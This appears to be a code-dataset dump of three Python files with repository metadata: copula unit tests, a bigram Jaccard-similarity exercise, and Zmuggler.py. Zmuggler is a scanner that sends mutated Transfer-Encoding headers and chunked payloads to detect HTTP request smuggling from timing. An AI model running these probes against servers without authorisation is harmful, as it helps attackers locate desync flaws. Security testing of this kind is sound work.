                print('3d not implemented for Archimedean copulas')
else:
mydistr = initialize(copula_string=copula_string, dim=3)
valuedict = {"solar": 0.12, "wind": 0.23, "tide": 0.31}
self.assertAlmostEqual(mydistr.C_from_sample(valuedict, 1000), mydistr.C(valuedict), 1)
def test_partial_derivative_C(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
valuedict = {"solar": 0.67, "wind": 0.82}
mydistr= initialize(copula_string=copula_string)
if copula_string=='student-copula':
precision = 2
elif copula_string=='gaussian-copula':
precision = 4
else:
precision = 7
def g(x):
return mydistr.C_partial_derivative(u=valuedict.get("solar"),v=x)
res,i= spi.quad(g,0,valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
valuedict = {"solar": 0.14, "wind": 0.42}
res, i = spi.quad(g, 0, valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
def test_inverse_partial_C(self,copula_string='independence-copula'):
"""
        In this test, we check that the inverse of the partial derivative f is correct by computing
        f(inverse_f(x)) and inverse_f(f(x)) and checking that both equal x.
"""
valuedict = {"solar": 0.84, "wind": 0.17}
mydistr = initialize(copula_string=copula_string)
u = valuedict.get("solar")
v = valuedict.get("wind")
direct = mydistr.C_partial_derivative(valuedict=valuedict)
inverse = mydistr.inverse_C_partial_derivative(valuedict=valuedict)
self.assertAlmostEqual(u,mydistr.C_partial_derivative(u=inverse,v=v),8)
self.assertAlmostEqual(u,mydistr.inverse_C_partial_derivative(u=direct,v=v),8)
def test_c_with_C_2_dim(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
valuedict = {"solar": 0.34, "wind": 0.73}
mydistr = initialize(copula_string=copula_string)
def g(x,y):
return mydistr.c(u=x,v=y)
def low_bound(x):
return 0
def up_bound(x):
return valuedict.get("wind")
res,i= spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict),res,4)
valuedict = {"solar": 0.12, "wind": 0.21}
res, i = spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict), res,4)
def test_c_with_partial_C_2_dim(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.14, "wind": 0.49}
def g(x):
return mydistr.c(u=x,v=valuedict.get("wind"))
if copula_string=='student-copula':
precision = 2
else:
precision = 6
res,i= spi.quad(g,0,valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict),res,precision)
valuedict = {"solar": 0.56, "wind": 0.37}
res, i = spi.quad(g, 0, valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict), res,precision)
def test_plot(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string,dim=dim)
n = 30 #number of points you want to display
U = mydistr.generates_U(n=n)
diag2 = diag(2)
for k in range(2): # index of the diagonal where you want to project we do both
plt.plot(U[:, 0], U[:, 1], 'go')
plt.plot([diag2.list_of_diag[k][0][1], diag2.list_of_diag[k][1][1]], 'b')
P = diag2.proj_vector(U,k)
plt.plot(P[:, 0], P[:, 1], 'ro')
plt.plot([U[:, 0], P[:, 0]], [U[:, 1], P[:, 1]], c='k')
plt.show()
if dim==3:
            if copula_string=='frank-copula' or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
                print('Plot 3d not implemented for Archimedean copulas')
else:
mydistr = initialize(dim=3,copula_string=copula_string)
n = 20 # number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P = []
fig = plt.figure()
center = 0.5 * np.ones(d)
k = 2 # index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj_vector(U[i], k)
ax.scatter(P[0, 0], P[0, 1], P[0, 2], c='r', marker='o')
ax.plot([U[i, 0], P[0, 0]], [U[i, 1], P[0, 1]], [U[i, 2], P[0, 2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0], diagonal[1][0]], [diagonal[0][1], diagonal[1][1]],
[diagonal[0][2], diagonal[1][2]],
c='b')
ax.set_xlabel(mydistr.dimkeys[0])
ax.set_ylabel(mydistr.dimkeys[1])
ax.set_zlabel(mydistr.dimkeys[2])
plt.show()
class LogLikelihoodTester(unittest.TestCase):
def test_gaussian_copula2d(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho = 0.5
rho2 = 0.7
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
gumbel = GumbelCopula(dimkeys, data_dict, marginals)
frank = FrankCopula(dimkeys, data_dict, marginals)
clayton = ClaytonCopula(dimkeys, data_dict, marginals)
student = StudentCopula(dimkeys, data_dict, marginals)
multigaussian1 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian3 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian4 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov)
l1=multigaussian1.c_log_likelihood()
self.assertGreater(l1,multigaussian2.c_log_likelihood())
self.assertGreater(multigaussian3.c_log_likelihood(),multigaussian4.c_log_likelihood())
self.assertGreater(l1,gumbel.c_log_likelihood())
self.assertGreater(l1, clayton.c_log_likelihood())
self.assertGreater(l1, frank.c_log_likelihood())
self.assertGreater(l1, student.c_log_likelihood())
def test_weighted_combined_copula3d(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
copulas= ['student-copula', 'gaussian-copula']
list_of_gaussian = ['gaussian-copula','gaussian-copula']
list_of_student = ['student-copula','student-copula']
weights =[0.12,0.88]
mydistr = WeightedCombinedCopula(dimkeys,data_dict,marginals,copulas,weights)
gaussian = GaussianCopula(dimkeys,data_dict,marginals)
weightedgaussian = WeightedCombinedCopula(dimkeys,data_dict,marginals,list_of_gaussian,weights)
weightedstudent = WeightedCombinedCopula(dimkeys, data_dict, marginals, list_of_student, weights)
student = StudentCopula(dimkeys,data_dict,marginals)
g = gaussian.c_log_likelihood()
s = student.c_log_likelihood()
m = mydistr.c_log_likelihood()
self.assertAlmostEqual(weightedgaussian.c_log_likelihood(),g,7)
self.assertAlmostEqual(weightedstudent.c_log_likelihood(),s,7)
self.assertGreater(g,m)
self.assertGreater(m,s)
class VineCopulaTester(unittest.TestCase):
def test_quick_dim_2(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [1, 0.5]
ourcov = [[1, 0.3], [0.3, 2]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula'],
[None, None]]
valuedict = {"solar": 0.96, "wind": 0.87}
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
gaussiancopula = GaussianCopula(dimkeys,data_dict,marginals)
gaussiancopula.c(valuedict)
self.assertAlmostEqual(CVine.C(valuedict),DVine.C(valuedict),1)
self.assertAlmostEqual(gaussiancopula.C(valuedict), DVine.C(valuedict), 1)
self.assertAlmostEqual(CVine.C(valuedict), gaussiancopula.C(valuedict), 1)
def test_quick_dim_3(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula', 'frank-copula'],
[None, None, 'clayton-copula'],
[None, None, None]]
valuedict = {"solar": 0.43, "wind": 0.92, "tide": 0.27}
print('CVine')
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(CVine.C(valuedict=valuedict))
print(CVine.c(valuedict))
print('DVine')
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(DVine.C(valuedict=valuedict))
print(DVine.c(valuedict))
def test_with_multinormal_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -3, "wind": -2.3, "tide": -0.9}
upperdict = {"solar": 1, "wind": 1.4, "tide": 2.7}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula'],
[None, None, 'gaussian-copula'],
[None, None, None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_with_multinormal_4_dim(self):
dimkeys = ["solar", "wind", "tide","geo"]
dimension = len(dimkeys)
ourmean = [0, 0, 0, 0]
ourcov = [[1, 0.1, 0.3,0.4], [0.1, 2, 0,0], [0.3, 0, 3,0],[0.4,0,0,4]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2]),
"geo":UnivariateNormalDistribution(var=ourcov[3][3], mean=ourmean[3])}
valuedict = {"solar": 0, "wind": 0, "tide": 0,"geo":0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1,"geo":-2}
upperdict = {"solar": 1, "wind": 1, "tide": 1,"geo":2}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula','gaussian-copula'],
[None, None, 'gaussian-copula','gaussian-copula'],
[None, None, None,'gaussian-copula'],
[None,None,None,None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_plot(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 1.3, 1.2], [1.3, 2, 0], [1.2, 0, 1.5]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'frank-copula'],
[None, None, 'gaussian-copula'],
[None, None, None]]
valuedict = {"solar": 1, "wind": 1, "tide": 0.73}
lowerdict = {"solar": -3, "wind": -2, "tide": 0}
upperdict = {"solar": 0.5, "wind": 1, "tide": 1}
mydistr = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
n = 20 #number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P =[]
fig = plt.figure()
center = 0.5*np.ones(d)
k = 2 #index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj(U[i],k)
ax.scatter(P[0,0],P[0,1],P[0,2], c='r', marker='o')
ax.plot([U[i,0], P[0,0]],[U[i,1], P[0,1]],[U[i,2], P[0,2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0],diagonal[1][0]], [diagonal[0][1],diagonal[1][1]],[diagonal[0][2],diagonal[1][2]], c='b')
ax.set_xlabel(dimkeys[0])
ax.set_ylabel(dimkeys[1])
ax.set_zlabel(dimkeys[2])
plt.show()
class RankHistogramTester(unittest.TestCase):
def test_normal_distribution(self):
mu = 0
sigma = 1
m = 10000
mydistr = UnivariateNormalDistribution(0, 1)
rank_data = mu + sigma * np.random.randn(10000)
rank = RankHistogram(mydistr, rank_data, 25)
rank.plot()
def test_gaussian_copula(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.5
rho2 = 0.5
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
rank_data = multigaussian2.generates_U(10000)
diag(2).rank_histogram(rank_data, 20, multigaussian1)
class EMDTester(unittest.TestCase):
def test_different_comparison(self):
"""
This test compare the different comparison we can imagine between a empirical distribution and the uniform distribution
The EMD to the uniform distribution is difficult to compute so we represent the uniform distribution by a vector :
Either by generating a random sample on [0,1] : Y
Or with regular interval of length 1/n on [0,1] : Z
Or with regular smaller regular intervals of length 1/m in [0,1] ; A
:return: print the histograms of the emd found for each vector when we compute 1000 of this 3 EMD
"""
n = 10000
m = 100
H = np.zeros((1000, 3))
Z = np.asarray(range(n)) / n
A = np.zeros(n)
        for i in range(m):
            for j in range(int(n / m)):
                A[i * (n // m) + j] = i / m
for k in range(1000):
X = np.random.rand(n)
Y = np.random.rand(n)
H[k][0] = emd_sort(U=X, V=Y)
H[k][1] = emd_sort(U=X, V=Z)
H[k][2]= emd_sort(U=X, V=A)
print(k)
count, bins, ignored = plt.hist(H, normed='True', label='Y', color='brk')
# EMD between X and Y will be in blue
# EMD between X and Z will be in red
# EMD between X and A will be in black
plt.legend(loc='upper right')
plt.plot(bins, np.ones_like(bins), linewidth=2, color='b')
plt.show()
def test_pyomo_with_sort(self):
n = 100
p=1
normal1 = np.random.randn(n)
normal2 = np.random.randn(n)
uniform1 = np.random.rand(n)
uniform2 = np.random.rand(n)
linearprog = np.asarray(range(n)) / n
U = linearprog
V = normal1
iter = []
for i in range(n):
for j in range(n):
iter.append((i, j))
print('Unsorted')
print('EMD sort')
tic()
print(emd_sort(U, V,p))
toc()
print('EMD pyomo')
tic()
print(emd_pyomo(U, V,p)[0])
toc()
print(' ')
print('EMD sort')
tic()
print(emd_sort(np.sort(U), np.sort(V),p))
toc()
print("sorted")
print('EMD pyomo')
tic()
print(emd_pyomo(np.sort(U),np.sort(V),p)[0])
toc()
def test_gaussian_copula(self):
#not finished yet
print("Warning test not finished yet")
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.1
rho2 = 0.9
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
print(emd_sort(data_array,data_array))
print(emd_sort(data_array2, data_array))
print(emd_sort(data_array2, data_array2))
#self.assertGreater(g, m)
#self.assertGreater(m, s)
if __name__ == '__main__':
i=0
for distr in ['empirical-copula']:
CopulaTester().test_plot(distr)
        i += 1
print(i)
| 43.644366
| 134
| 0.61584
| 4,520
| 37,185
| 4.91792
| 0.100885
| 0.019794
| 0.056593
| 0.010887
| 0.693643
| 0.627649
| 0.572405
| 0.52364
| 0.468262
| 0.437402
| 0
| 0.041509
| 0.25236
| 37,185
| 851
| 135
| 43.695652
| 0.758066
| 0.064004
| 0
| 0.479514
| 0
| 0
| 0.05282
| 0
| 0
| 0
| 0
| 0
| 0.08346
| 1
| 0.069803
| false
| 0
| 0.025797
| 0.007587
| 0.124431
| 0.051593
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa32fa26545cc0a0f75090c1a789058c3f6ac3d
| 751
|
py
|
Python
|
src/level2/뉴스클러스터링.py
|
iml1111/programmers_coding_study
|
07e89220c59c3b40dd92edc39d1b573d018efae4
|
[
"MIT"
] | 1
|
2021-01-03T13:01:33.000Z
|
2021-01-03T13:01:33.000Z
|
src/level2/뉴스클러스터링.py
|
iml1111/programmers_coding_study
|
07e89220c59c3b40dd92edc39d1b573d018efae4
|
[
"MIT"
] | null | null | null |
src/level2/뉴스클러스터링.py
|
iml1111/programmers_coding_study
|
07e89220c59c3b40dd92edc39d1b573d018efae4
|
[
"MIT"
] | null | null | null |
from collections import Counter
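# News clustering: Jaccard similarity of the two strings' letter-bigram multisets, scaled by 65536.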
def refine(s):
result = []
for i in range(len(s) - 1):
bigram = s[i:i+2].lower()
if bigram.isalpha():
result.append(bigram)
return result
def solution(str1, str2):
counter1, counter2 = Counter(refine(str1)), Counter(refine(str2))
set1, set2 = set([i for i in counter1]), set([i for i in counter2])
a_point = sum([min(counter1[idx], counter2[idx]) for idx in set1 & set2])
b_point = sum([max(counter1[idx], counter2[idx]) for idx in set1 | set2])
if a_point == b_point:
return 65536
else:
return int(a_point / b_point * 65536)
if __name__ == '__main__':
#print(solution("FRANCE", "french"))
print(solution("E=M*C^2", "e=m*c^2"))
| 31.291667
| 77
| 0.609854
| 113
| 751
| 3.929204
| 0.415929
| 0.027027
| 0.040541
| 0.036036
| 0.216216
| 0.171171
| 0.171171
| 0.171171
| 0.171171
| 0
| 0
| 0.055652
| 0.234354
| 751
| 24
| 78
| 31.291667
| 0.716522
| 0.046605
| 0
| 0
| 0
| 0
| 0.030726
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.052632
| 0
| 0.315789
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5faad04658ea51684534a077173c5f03481fc86f
| 6,728
|
py
|
Python
|
Zmuggler.py
|
electronicbots/Zmuggler
|
5b9df5919367dffb588b18c5acd567e20135d2b7
|
[
"MIT"
] | 1
|
2021-07-28T06:02:44.000Z
|
2021-07-28T06:02:44.000Z
|
Zmuggler.py
|
electronicbots/Zmuggler
|
5b9df5919367dffb588b18c5acd567e20135d2b7
|
[
"MIT"
] | null | null | null |
Zmuggler.py
|
electronicbots/Zmuggler
|
5b9df5919367dffb588b18c5acd567e20135d2b7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
from requests import Request, Session
from requests.exceptions import ReadTimeout
import urllib3, requests, collections, http.client, optparse, sys, os
print("""\033[1;36m
_____ _
|__ /_ __ ___ _ _ __ _ __ _| | ___ _ __
/ /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|
/ /_| | | | | | |_| | (_| | (_| | | __/ |
/____|_| |_| |_|\__,_|\__, |\__, |_|\___|_|
|___/ |___/
| Zmuggler |
| @electronicbots |
\033[1;m""")
http.client._header_name = lambda x: True
http.client._header_value = lambda x: False
urllib3.disable_warnings()
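# ZSmuggler probes a URL for HTTP request smuggling (CL.TE / TE.CL) by sending mutated
# Transfer-Encoding headers and comparing response timings for large vs. small Content-Length values.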
class ZSmuggler():
def __init__(self, url):
self.url = url
self.pheaders = []
self.rheaders = []
def genHeaders(self):
transfer_encoding = list(
[
["Transfer-Encoding", "chunked"],
["Transfer-Encoding ", "chunked"],
["Transfer_Encoding", "chunked"],
["Transfer Encoding", "chunked"],
[" Transfer-Encoding", "chunked"],
["Transfer-Encoding", " chunked"],
["Transfer-Encoding", "chunked"],
["Transfer-Encoding", "\tchunked"],
["Transfer-Encoding", "\u000Bchunked"],
["Content-Encoding", " chunked"],
["Transfer-Encoding", "\n chunked"],
["Transfer-Encoding\n ", " chunked"],
["Transfer-Encoding", " \"chunked\""],
["Transfer-Encoding", " 'chunked'"],
["Transfer-Encoding", " \n\u000Bchunked"],
["Transfer-Encoding", " \n\tchunked"],
["Transfer-Encoding", " chunked, cow"],
["Transfer-Encoding", " cow, "],
["Transfer-Encoding", " chunked\r\nTransfer-encoding: cow"],
["Transfer-Encoding", " chunk"],
["Transfer-Encoding", " cHuNkeD"],
["TrAnSFer-EnCODinG", " cHuNkeD"],
["Transfer-Encoding", " CHUNKED"],
["TRANSFER-ENCODING", " CHUNKED"],
["Transfer-Encoding", " chunked\r"],
["Transfer-Encoding", " chunked\t"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer\r-Encoding", " chunked"],
["barn\n\nTransfer-Encoding", " chunked"],
])
for x in transfer_encoding:
headers = collections.OrderedDict()
headers[x[0]] = x[1]
headers['Cache-Control'] = "no-cache"
headers['Content-Type'] = "application/x-www-form-urlencoded"
headers['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
self.pheaders.append(headers)
def resptime(self, headers={}, payload=""):
s = Session()
req = Request('POST', self.url, data=payload)
prepped = req.prepare()
prepped.headers = headers
resp_time = 0
try:
resp = s.send(prepped, verify=False, timeout=10)
resp_time = resp.elapsed.total_seconds()
except Exception as e:
if isinstance(e, ReadTimeout):
resp_time = 10
return resp_time
def calcT(self, L_Bigtime, P_Bigtime, L_Smalltime, P_Smalltime):
for headers in self.pheaders:
headers['Content-Length'] = L_Bigtime
big_time = self.resptime(headers, P_Bigtime)
if not big_time:
big_time = 0
if big_time < 5:
continue
headers['Content-Length'] = L_Smalltime
small_time = self.resptime(headers, P_Smalltime)
if not small_time:
small_time = 1
if big_time > 5 and big_time / small_time >= 5:
self.valid = True
self.type = "CL-TE"
self.rheaders = [headers]
return True
return False
def Bcheck(self):
header = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
try:
resp = requests.get(self.url, headers=header, verify=False, timeout=10)
if resp.status_code == 200:
return True
else:
return False
except Exception as error:
print(error)
def checkCLTE(self):
result = self.calcT(4, "1\r\nA\r\nS\r\n\r\n\r\n", 11, "1\r\nA\r\nS\r\n\r\n\r\n")
return result
def checkTECL(self):
result = self.calcT(6, "0\r\n\r\nX", 5, "0\r\n\r\n")
return result
def expl0it(self):
if self.Bcheck():
self.genHeaders()
try:
result = self.checkCLTE()
flag = "CLTE"
if not result:
result = self.checkTECL()
flag = "TECL"
if result:
print("\033[1;31m" + "\033[1;m\033[1;32m[+] Found possible " + flag)
self.recheck(flag)
except Exception as e:
print(e)
print("timeout: " + self.url)
else:
print('\033[1;31m' + "[-] can't access target" + '\033[1;m')
def recheck(self, flag):
print("[+] Checking again...")
result = False
if flag == "CLTE":
result = self.checkCLTE()
if flag == "TECL":
result = self.checkTECL()
if result:
payloadkey = list(self.rheaders[0])[0]
payloadV = self.rheaders[0][payloadkey]
payload = str([payloadkey, payloadV])
print(flag, payload)
def Main():
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.link)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
def Args():
Parser = optparse.OptionParser()
group = optparse.OptionGroup(Parser, "Grouped arguments")
group.add_option('--target' , dest='link', help = 'target URL')
Parser.add_option_group(group)
(arguments, values) = Parser.parse_args()
return arguments
if __name__ == '__main__':
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.link)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
| 35.597884
| 148
| 0.5
| 658
| 6,728
| 4.93617
| 0.287234
| 0.142857
| 0.120382
| 0.143165
| 0.267857
| 0.239224
| 0.239224
| 0.213978
| 0.184421
| 0.163177
| 0
| 0.026651
| 0.35865
| 6,728
| 188
| 149
| 35.787234
| 0.726072
| 0.002527
| 0
| 0.233129
| 0
| 0.042945
| 0.284501
| 0.030402
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067485
| false
| 0
| 0.018405
| 0
| 0.141104
| 0.06135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5faed7df0481d882b8814038712e8be58ef77e17
| 3,397
|
py
|
Python
|
cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py
|
ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra
|
07e5d308c6a8641a369a3e0b8d13c4104988cd2b
|
[
"BSD-2-Clause"
] | 1
|
2021-09-15T10:10:26.000Z
|
2021-09-15T10:10:26.000Z
|
cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py
|
ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra
|
07e5d308c6a8641a369a3e0b8d13c4104988cd2b
|
[
"BSD-2-Clause"
] | null | null | null |
cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py
|
